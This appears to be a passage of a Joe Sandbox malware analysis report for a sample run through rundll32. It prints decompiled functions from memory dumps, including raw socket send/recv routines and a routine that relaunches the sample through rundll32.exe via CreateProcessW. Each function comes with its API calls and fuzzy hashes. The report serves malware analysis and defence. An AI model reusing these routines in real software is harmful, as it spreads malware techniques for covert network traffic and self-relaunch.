                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFree$Sleep$memset$htonsrandrecv
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2891003447-0
                                                                                                                                                  • Opcode ID: 922a22cb9f34dae9ec403691292c577e20a02552a5d24ecb20ff412b8d66f5d7
                                                                                                                                                  • Instruction ID: 707e623b691bd38ce098d11bb734dfd7165e62fe8a8dd24a8c105505447ed5c9
                                                                                                                                                  • Opcode Fuzzy Hash: 922a22cb9f34dae9ec403691292c577e20a02552a5d24ecb20ff412b8d66f5d7
                                                                                                                                                  • Instruction Fuzzy Hash: D3F1B371A04705AFDB11CF48C844AABBBB2FF49304F4984ADE949AB351D3B6F915CB90
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 68%
                                                                                                                                                  			E04772E12(intOrPtr _a4, signed int _a8, short _a12) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _t43;
                                                                                                                                                  				void* _t49;
                                                                                                                                                  				short _t52;
                                                                                                                                                  				short _t53;
                                                                                                                                                  				short _t54;
                                                                                                                                                  				short _t55;
                                                                                                                                                  				short _t60;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				signed int _t67;
                                                                                                                                                  				void* _t75;
                                                                                                                                                  				signed int _t78;
                                                                                                                                                  
                                                                                                                                                  				_v5 = 0;
                                                                                                                                                  				_v12 = 0xbadf00d;
                                                                                                                                                  				_t43 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                  				_v16 = _t43;
                                                                                                                                                  				if(_t43 == 0) {
                                                                                                                                                  					L14:
                                                                                                                                                  					return _v5;
                                                                                                                                                  				}
                                                                                                                                                  				_t65 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                                                                  				if(_t65 == 0) {
                                                                                                                                                  					L13:
                                                                                                                                                  					HeapFree(GetProcessHeap(), 8, _v16);
                                                                                                                                                  					goto L14;
                                                                                                                                                  				}
                                                                                                                                                  				_t67 = 9;
                                                                                                                                                  				_t49 = memcpy(_t65, _a8, _t67 << 2);
                                                                                                                                                  				__imp__#9(0x44);
                                                                                                                                                  				 *(_t65 + 0x31) =  *(_t65 + 0x31) | 0xffffffff;
                                                                                                                                                  				 *(_t65 + 2) = _t49;
                                                                                                                                                  				_t78 = _a8;
                                                                                                                                                  				 *((short*)(_t65 + 0x25)) = 0xfc;
                                                                                                                                                  				 *((short*)(_t65 + 0x27)) = 0xec0;
                                                                                                                                                  				_t52 = 0x40;
                                                                                                                                                  				 *((short*)(_t65 + 0x29)) = _t52;
                                                                                                                                                  				_t53 = 4;
                                                                                                                                                  				 *((short*)(_t65 + 0x37)) = _t53;
                                                                                                                                                  				_t54 = 0x40;
                                                                                                                                                  				 *((short*)(_t65 + 0x39)) = _t54;
                                                                                                                                                  				_t55 = 5;
                                                                                                                                                  				 *((short*)(_t65 + 0x41)) = _t55;
                                                                                                                                                  				 *((char*)(_t65 + 8)) = 0x25;
                                                                                                                                                  				 *((char*)(_t65 + 0x24)) = 0xe;
                                                                                                                                                  				 *((short*)(_t65 + 0x44)) = _a12;
                                                                                                                                                  				_a8 = _a8 & 0x00000000;
                                                                                                                                                  				 *(_t78 + 0x22) = ( *(_t78 + 0x22) & 0x0000ff00) - 0x100;
                                                                                                                                                  				L3:
                                                                                                                                                  				L3:
                                                                                                                                                  				if(_a8 != 8) {
                                                                                                                                                  					 *(_t78 + 0x22) =  *(_t78 + 0x22) + 1;
                                                                                                                                                  					_t60 =  *(_t78 + 0x22);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t60 = _a12;
                                                                                                                                                  				}
                                                                                                                                                  				 *((short*)(_t65 + 0x22)) = _t60;
                                                                                                                                                  				__imp__#19(_a4, _t65, 0x48, 0);
                                                                                                                                                  				if(_t60 > 0) {
                                                                                                                                                  					_t75 = _v16;
                                                                                                                                                  					__imp__#16(_a4, _t75, 0xffff, 0);
                                                                                                                                                  					if(_t60 > 0) {
                                                                                                                                                  						_v12 =  *((intOrPtr*)(_t75 + 9));
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				if(_v12 != 0) {
                                                                                                                                                  					goto L12;
                                                                                                                                                  				}
                                                                                                                                                  				_a8 = _a8 + 1;
                                                                                                                                                  				if(_a8 < 0xc) {
                                                                                                                                                  					goto L3;
                                                                                                                                                  				}
                                                                                                                                                  				_v5 = 1;
                                                                                                                                                  				L12:
                                                                                                                                                  				HeapFree(GetProcessHeap(), 8, _t65);
                                                                                                                                                  				goto L13;
                                                                                                                                                  			}

















                                                                                                                                                  0x04772e27
                                                                                                                                                  0x04772e2b
                                                                                                                                                  0x04772e3b
                                                                                                                                                  0x04772e3d
                                                                                                                                                  0x04772e42
                                                                                                                                                  0x04772f51
                                                                                                                                                  0x04772f57
                                                                                                                                                  0x04772f57
                                                                                                                                                  0x04772e52
                                                                                                                                                  0x04772e56
                                                                                                                                                  0x04772f3e
                                                                                                                                                  0x04772f4a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772f50
                                                                                                                                                  0x04772e61
                                                                                                                                                  0x04772e66
                                                                                                                                                  0x04772e68
                                                                                                                                                  0x04772e6e
                                                                                                                                                  0x04772e72
                                                                                                                                                  0x04772e76
                                                                                                                                                  0x04772e80
                                                                                                                                                  0x04772e89
                                                                                                                                                  0x04772e8d
                                                                                                                                                  0x04772e8e
                                                                                                                                                  0x04772e94
                                                                                                                                                  0x04772e95
                                                                                                                                                  0x04772e9b
                                                                                                                                                  0x04772e9c
                                                                                                                                                  0x04772ea2
                                                                                                                                                  0x04772ea3
                                                                                                                                                  0x04772eab
                                                                                                                                                  0x04772eaf
                                                                                                                                                  0x04772eb3
                                                                                                                                                  0x04772ecb
                                                                                                                                                  0x04772ecf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772ed3
                                                                                                                                                  0x04772ed7
                                                                                                                                                  0x04772edf
                                                                                                                                                  0x04772ee3
                                                                                                                                                  0x04772ed9
                                                                                                                                                  0x04772ed9
                                                                                                                                                  0x04772ed9
                                                                                                                                                  0x04772eef
                                                                                                                                                  0x04772ef3
                                                                                                                                                  0x04772efb
                                                                                                                                                  0x04772efd
                                                                                                                                                  0x04772f0b
                                                                                                                                                  0x04772f13
                                                                                                                                                  0x04772f18
                                                                                                                                                  0x04772f18
                                                                                                                                                  0x04772f13
                                                                                                                                                  0x04772f1f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772f21
                                                                                                                                                  0x04772f28
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04772f2a
                                                                                                                                                  0x04772f2e
                                                                                                                                                  0x04772f38
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,0000FFFF,?,00000000,?), ref: 04772E32
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04772E3B
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000048,74CB4F20), ref: 04772E4D
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04772E50
                                                                                                                                                  • htons.WS2_32(00000044), ref: 04772E68
                                                                                                                                                  • send.WS2_32(0BADF00D,00000000,00000048,00000000), ref: 04772EF3
                                                                                                                                                  • recv.WS2_32(0BADF00D,00000008,0000FFFF,00000000), ref: 04772F0B
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 04772F31
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04772F38
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 04772F43
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04772F4A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFree$htonsrecvsend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1780562090-0
                                                                                                                                                  • Opcode ID: 640ce054b16ec2ba0a3acd22008978c20640c313c742b3b84c6661758ad004ac
                                                                                                                                                  • Instruction ID: 187f6fe2eed1b1cc3e7e2a8272bc86be126f4725f56e1a26085f8eb0f706ba17
                                                                                                                                                  • Opcode Fuzzy Hash: 640ce054b16ec2ba0a3acd22008978c20640c313c742b3b84c6661758ad004ac
                                                                                                                                                  • Instruction Fuzzy Hash: 0341C335640345FAEF209FA4D849BAA7BB4FF48310F508499FA19EF281D7B8D845CB18
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E04777BF7(intOrPtr _a12) {
                                                                                                                                                  				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                  				struct _STARTUPINFOW _v88;
                                                                                                                                                  				short _v1648;
                                                                                                                                                  				short _v3208;
                                                                                                                                                  				int _t14;
                                                                                                                                                  				char* _t20;
                                                                                                                                                  				char* _t21;
                                                                                                                                                  				void* _t27;
                                                                                                                                                  				long _t28;
                                                                                                                                                  				long _t29;
                                                                                                                                                  
                                                                                                                                                  				_t14 = GetSystemDirectoryW( &_v1648, 0x30c);
                                                                                                                                                  				if(_t14 != 0) {
                                                                                                                                                  					_t14 = lstrcatW( &_v1648, L"\\rundll32.exe");
                                                                                                                                                  					if(_t14 != 0) {
                                                                                                                                                  						_t14 = GetModuleFileNameW( *0x4787b98, 0x4787bc8, 0x30c);
                                                                                                                                                  						if(_t14 != 0) {
                                                                                                                                                  							wsprintfW( &_v3208, L"%ws C:\\Windows\\%ws,#1 %ws",  &_v1648, PathFindFileNameW(0x4787bc8), _a12);
                                                                                                                                                  							_t27 = 0x10;
                                                                                                                                                  							_t20 =  &_v20;
                                                                                                                                                  							do {
                                                                                                                                                  								 *_t20 = 0;
                                                                                                                                                  								_t20 = _t20 + 1;
                                                                                                                                                  								_t27 = _t27 - 1;
                                                                                                                                                  							} while (_t27 != 0);
                                                                                                                                                  							_t29 = 0x44;
                                                                                                                                                  							_t28 = _t29;
                                                                                                                                                  							_t21 =  &_v88;
                                                                                                                                                  							do {
                                                                                                                                                  								 *_t21 = 0;
                                                                                                                                                  								_t21 = _t21 + 1;
                                                                                                                                                  								_t28 = _t28 - 1;
                                                                                                                                                  							} while (_t28 != 0);
                                                                                                                                                  							_v88.cb = _t29;
                                                                                                                                                  							_t14 = CreateProcessW( &_v1648,  &_v3208, 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
                                                                                                                                                  							ExitProcess(0);
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _t14;
                                                                                                                                                  			}













                                                                                                                                                  0x04777c0e
                                                                                                                                                  0x04777c16
                                                                                                                                                  0x04777c28
                                                                                                                                                  0x04777c30
                                                                                                                                                  0x04777c43
                                                                                                                                                  0x04777c4b
                                                                                                                                                  0x04777c6b
                                                                                                                                                  0x04777c76
                                                                                                                                                  0x04777c77
                                                                                                                                                  0x04777c7c
                                                                                                                                                  0x04777c7c
                                                                                                                                                  0x04777c7e
                                                                                                                                                  0x04777c7f
                                                                                                                                                  0x04777c7f
                                                                                                                                                  0x04777c84
                                                                                                                                                  0x04777c85
                                                                                                                                                  0x04777c87
                                                                                                                                                  0x04777c8a
                                                                                                                                                  0x04777c8a
                                                                                                                                                  0x04777c8c
                                                                                                                                                  0x04777c8d
                                                                                                                                                  0x04777c8d
                                                                                                                                                  0x04777cb0
                                                                                                                                                  0x04777cb3
                                                                                                                                                  0x04777cba
                                                                                                                                                  0x04777cba
                                                                                                                                                  0x04777c4b
                                                                                                                                                  0x04777c30
                                                                                                                                                  0x04777cc2

                                                                                                                                                  APIs
                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 04777C0E
                                                                                                                                                  • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 04777C28
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(04787BC8,0000030C), ref: 04777C43
                                                                                                                                                  • PathFindFileNameW.SHLWAPI(04787BC8,?), ref: 04777C51
                                                                                                                                                  • wsprintfW.USER32 ref: 04777C6B
                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 04777CB3
                                                                                                                                                  • ExitProcess.KERNEL32 ref: 04777CBA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileNameProcess$CreateDirectoryExitFindModulePathSystemlstrcatwsprintf
                                                                                                                                                  • String ID: %ws C:\Windows\%ws,#1 %ws$\rundll32.exe
                                                                                                                                                  • API String ID: 3592876439-3730106045
                                                                                                                                                  • Opcode ID: 824740eb57b3d20b0c97ab0379b0623caa533344c9e44a3a34b582131302c0de
                                                                                                                                                  • Instruction ID: 7c686359524a17c1645cf9b43b9bc97ade6c3653a1ca9693690bf4fec36b2f7b
                                                                                                                                                  • Opcode Fuzzy Hash: 824740eb57b3d20b0c97ab0379b0623caa533344c9e44a3a34b582131302c0de
                                                                                                                                                  • Instruction Fuzzy Hash: 43119DB25001196FEF259BA4CD48EEB7B7DEF08300F448165F506E2140DA34ED498B64
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E047769AE(void* _a4, void* _a8, intOrPtr _a12) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				intOrPtr* _t31;
                                                                                                                                                  				void* _t36;
                                                                                                                                                  				intOrPtr* _t38;
                                                                                                                                                  				intOrPtr* _t43;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				intOrPtr* _t51;
                                                                                                                                                  				long _t57;
                                                                                                                                                  				intOrPtr _t61;
                                                                                                                                                  				void* _t63;
                                                                                                                                                  				intOrPtr _t64;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				intOrPtr _t66;
                                                                                                                                                  				intOrPtr _t67;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				intOrPtr _t69;
                                                                                                                                                  				void* _t70;
                                                                                                                                                  
                                                                                                                                                  				_t31 = _a4;
                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                  				_t61 =  *0x4787b80;
                                                                                                                                                  				_t63 = _t31 + 2;
                                                                                                                                                  				do {
                                                                                                                                                  					_t67 =  *_t31;
                                                                                                                                                  					_t31 = _t31 + 2;
                                                                                                                                                  				} while (_t67 != 0);
                                                                                                                                                  				_t36 = HeapAlloc(GetProcessHeap(), 8, (_t31 - _t63 >> 1) + (_t31 - _t63 >> 1) + 2);
                                                                                                                                                  				_v16 = _t36;
                                                                                                                                                  				if(_t36 != 0) {
                                                                                                                                                  					_t38 = _a4;
                                                                                                                                                  					_t68 = _t38 + 2;
                                                                                                                                                  					do {
                                                                                                                                                  						_t64 =  *_t38;
                                                                                                                                                  						_t38 = _t38 + 2;
                                                                                                                                                  					} while (_t64 != 0);
                                                                                                                                                  					memcpy(_v16, _a4, (_t38 - _t68 >> 1) + (_t38 - _t68 >> 1) + 2);
                                                                                                                                                  					_t43 = _a8;
                                                                                                                                                  					_t65 = _t43 + 2;
                                                                                                                                                  					do {
                                                                                                                                                  						_t69 =  *_t43;
                                                                                                                                                  						_t43 = _t43 + 2;
                                                                                                                                                  					} while (_t69 != 0);
                                                                                                                                                  					_t48 = HeapAlloc(GetProcessHeap(), 8, (_t43 - _t65 >> 1) + (_t43 - _t65 >> 1) + 2);
                                                                                                                                                  					_v12 = _t48;
                                                                                                                                                  					if(_t48 == 0) {
                                                                                                                                                  						L12:
                                                                                                                                                  						HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                                                                  					} else {
                                                                                                                                                  						_t51 = _a8;
                                                                                                                                                  						_t70 = _t51 + 2;
                                                                                                                                                  						do {
                                                                                                                                                  							_t66 =  *_t51;
                                                                                                                                                  							_t51 = _t51 + 2;
                                                                                                                                                  						} while (_t66 != 0);
                                                                                                                                                  						memcpy(_v12, _a8, (_t51 - _t70 >> 1) + (_t51 - _t70 >> 1) + 2);
                                                                                                                                                  						_t57 = E04776E66(_t66, _t61,  &_v16, _a12);
                                                                                                                                                  						_v8 = _t57;
                                                                                                                                                  						if(_t57 == 0) {
                                                                                                                                                  							HeapFree(GetProcessHeap(), _t57, _v12);
                                                                                                                                                  							goto L12;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return _v8;
                                                                                                                                                  			}






















                                                                                                                                                  0x047769b4
                                                                                                                                                  0x047769b7
                                                                                                                                                  0x047769bc
                                                                                                                                                  0x047769c4
                                                                                                                                                  0x047769c7
                                                                                                                                                  0x047769c7
                                                                                                                                                  0x047769ca
                                                                                                                                                  0x047769cd
                                                                                                                                                  0x047769ec
                                                                                                                                                  0x047769ee
                                                                                                                                                  0x047769f3
                                                                                                                                                  0x047769f9
                                                                                                                                                  0x047769fc
                                                                                                                                                  0x047769ff
                                                                                                                                                  0x047769ff
                                                                                                                                                  0x04776a02
                                                                                                                                                  0x04776a05
                                                                                                                                                  0x04776a19
                                                                                                                                                  0x04776a1e
                                                                                                                                                  0x04776a24
                                                                                                                                                  0x04776a27
                                                                                                                                                  0x04776a27
                                                                                                                                                  0x04776a2a
                                                                                                                                                  0x04776a2d
                                                                                                                                                  0x04776a40
                                                                                                                                                  0x04776a48
                                                                                                                                                  0x04776a4d
                                                                                                                                                  0x04776a94
                                                                                                                                                  0x04776a9c
                                                                                                                                                  0x04776a4f
                                                                                                                                                  0x04776a4f
                                                                                                                                                  0x04776a52
                                                                                                                                                  0x04776a55
                                                                                                                                                  0x04776a55
                                                                                                                                                  0x04776a58
                                                                                                                                                  0x04776a5b
                                                                                                                                                  0x04776a6f
                                                                                                                                                  0x04776a7f
                                                                                                                                                  0x04776a84
                                                                                                                                                  0x04776a89
                                                                                                                                                  0x04776a92
                                                                                                                                                  0x00000000
                                                                                                                                                  0x04776a92
                                                                                                                                                  0x04776a89
                                                                                                                                                  0x04776a4d
                                                                                                                                                  0x04776aa5

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,769C84F0,00000000,00000000), ref: 047769E3
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047769EC
                                                                                                                                                  • memcpy.MSVCRT ref: 04776A19
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 04776A3D
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04776A40
                                                                                                                                                  • memcpy.MSVCRT ref: 04776A6F
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 04776A8F
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04776A92
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 04776A99
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04776A9C
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFreememcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3405790324-0
                                                                                                                                                  • Opcode ID: b04c6a88f54ed7a2af1b9000cf9bf155bcfe3bc92f3edb5475e1d51dc125a1c1
                                                                                                                                                  • Instruction ID: 156f9434961d86045c55d54dd49a9a2fc507c5035aa63e9f495c00e55967f006
                                                                                                                                                  • Opcode Fuzzy Hash: b04c6a88f54ed7a2af1b9000cf9bf155bcfe3bc92f3edb5475e1d51dc125a1c1
                                                                                                                                                  • Instruction Fuzzy Hash: 9231A13590020AAFDF209FA8CC45EAE7BB9EF44354F068455E904DB255E630E614CB90
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                  			E047768B5(void* _a4, void* _a8) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				void* _v16;
                                                                                                                                                  				void* _v20;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				intOrPtr* _t33;
                                                                                                                                                  				void* _t38;
                                                                                                                                                  				intOrPtr* _t40;
                                                                                                                                                  				intOrPtr* _t45;
                                                                                                                                                  				void* _t50;
                                                                                                                                                  				intOrPtr* _t53;
                                                                                                                                                  				void* _t67;
                                                                                                                                                  				intOrPtr _t68;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				intOrPtr _t70;
                                                                                                                                                  				intOrPtr _t71;
                                                                                                                                                  				void* _t72;
                                                                                                                                                  				intOrPtr _t73;
                                                                                                                                                  				void* _t74;
                                                                                                                                                  
                                                                                                                                                  				_v8 = _v8 & 0x00000000;
                                                                                                                                                  				_v12 =  *0x4787b80;
                                                                                                                                                  				_t33 = _a4;
                                                                                                                                                  				_t67 = _t33 + 2;
                                                                                                                                                  				do {
                                                                                                                                                  					_t71 =  *_t33;
                                                                                                                                                  					_t33 = _t33 + 2;
                                                                                                                                                  				} while (_t71 != 0);
                                                                                                                                                  				_t38 = HeapAlloc(GetProcessHeap(), 8, (_t33 - _t67 >> 1) + (_t33 - _t67 >> 1) + 2);
                                                                                                                                                  				_v20 = _t38;
                                                                                                                                                  				if(_t38 != 0) {
                                                                                                                                                  					_t40 = _a4;
                                                                                                                                                  					_t72 = _t40 + 2;
                                                                                                                                                  					do {
                                                                                                                                                  						_t68 =  *_t40;
                                                                                                                                                  						_t40 = _t40 + 2;
                                                                                                                                                  					} while (_t68 != 0);
                                                                                                                                                  					memcpy(_v20, _a4, (_t40 - _t72 >> 1) + (_t40 - _t72 >> 1) + 2);
                                                                                                                                                  					_t45 = _a8;
                                                                                                                                                  					_t69 = _t45 + 2;
                                                                                                                                                  					do {
                                                                                                                                                  						_t73 =  *_t45;
                                                                                                                                                  						_t45 = _t45 + 2;
                                                                                                                                                  					} while (_t73 != 0);
                                                                                                                                                  					_t50 = HeapAlloc(GetProcessHeap(), 8, (_t45 - _t69 >> 1) + (_t45 - _t69 >> 1) + 2);
                                                                                                                                                  					_v16 = _t50;
                                                                                                                                                  					if(_t50 != 0) {
                                                                                                                                                  						_t53 = _a8;
                                                                                                                                                  						_t74 = _t53 + 2;
                                                                                                                                                  						do {
                                                                                                                                                  							_t70 =  *_t53;
                                                                                                                                                  							_t53 = _t53 + 2;
                                                                                                                                                  						} while (_t70 != 0);
                                                                                                                                                  						memcpy(_v16, _a8, (_t53 - _t74 >> 1) + (_t53 - _t74 >> 1) + 2);
                                                                                                                                                  						_v8 = E04776E1B(_v12, 0, _t70,  &_v20);
                                                                                                                                                  						HeapFree(GetProcessHeap(), 0, _v16);
                                                                                                                                                  					}
                                                                                                                                                  					HeapFree(GetProcessHeap(), 0, _v20);
                                                                                                                                                  				}
                                                                                                                                                  				return _v8;
                                                                                                                                                  			}






















                                                                                                                                                  0x047768c0
                                                                                                                                                  0x047768c4
                                                                                                                                                  0x047768c7
                                                                                                                                                  0x047768ca
                                                                                                                                                  0x047768cd
                                                                                                                                                  0x047768cd
                                                                                                                                                  0x047768d0
                                                                                                                                                  0x047768d3
                                                                                                                                                  0x047768f4
                                                                                                                                                  0x047768f6
                                                                                                                                                  0x047768fb
                                                                                                                                                  0x04776901
                                                                                                                                                  0x04776904
                                                                                                                                                  0x04776907
                                                                                                                                                  0x04776907
                                                                                                                                                  0x0477690a
                                                                                                                                                  0x0477690d
                                                                                                                                                  0x04776921
                                                                                                                                                  0x04776926
                                                                                                                                                  0x0477692c
                                                                                                                                                  0x0477692f
                                                                                                                                                  0x0477692f
                                                                                                                                                  0x04776932
                                                                                                                                                  0x04776935
                                                                                                                                                  0x04776949
                                                                                                                                                  0x04776951
                                                                                                                                                  0x04776956
                                                                                                                                                  0x04776958
                                                                                                                                                  0x0477695b
                                                                                                                                                  0x0477695e
                                                                                                                                                  0x0477695e
                                                                                                                                                  0x04776961
                                                                                                                                                  0x04776964
                                                                                                                                                  0x04776978
                                                                                                                                                  0x04776991
                                                                                                                                                  0x04776998
                                                                                                                                                  0x04776998
                                                                                                                                                  0x047769a2
                                                                                                                                                  0x047769a4
                                                                                                                                                  0x047769ab

                                                                                                                                                  APIs
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,7491C0B0,00000000), ref: 047768EB
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 047768F4
                                                                                                                                                  • memcpy.MSVCRT ref: 04776921
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,74CB4D40), ref: 04776946
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 04776949
                                                                                                                                                  • memcpy.MSVCRT ref: 04776978
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?), ref: 04776995
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 04776998
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 0477699F
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 047769A2
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000C.00000002.345534570.0000000004771000.00000020.00001000.00020000.00000000.sdmp, Offset: 04770000, based on PE: true
                                                                                                                                                  • Associated: 0000000C.00000002.345467981.0000000004770000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345651002.000000000477D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345685144.0000000004783000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  • Associated: 0000000C.00000002.345701016.0000000004789000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_12_2_4770000_rundll32.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocFreememcpy
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3405790324-0
                                                                                                                                                  • Opcode ID: f53bf0f2fae05506dd4581959e15703eb578b07407edda55cdb7b9136e54e066
                                                                                                                                                  • Instruction ID: cc022fca9f6c52a922cb0813976fa1ecf740cecaa9541fdba27a1eadd264d502
                                                                                                                                                  • Opcode Fuzzy Hash: f53bf0f2fae05506dd4581959e15703eb578b07407edda55cdb7b9136e54e066
                                                                                                                                                  • Instruction Fuzzy Hash: BC318B7190020AAFDF10EFA8CC49EAFBBB8EF48354F458455E944DB255EB70EA04CB90
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                  			E047740E3(intOrPtr* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed short _a24) {
                                                                                                                                                  				char _v5;
                                                                                                                                                  				void* _v12;
                                                                                                                                                  				void* _t43;
                                                                                                                                                  				signed int _t50;
                                                                                                                                                  				intOrPtr* _t54;
                                                                                                                                                  				void* _t63;
                                                                                                                                                  
                                                                                                                                                  				_t54 = __ebx;
                                                                                                                                                  				_push(__ecx);
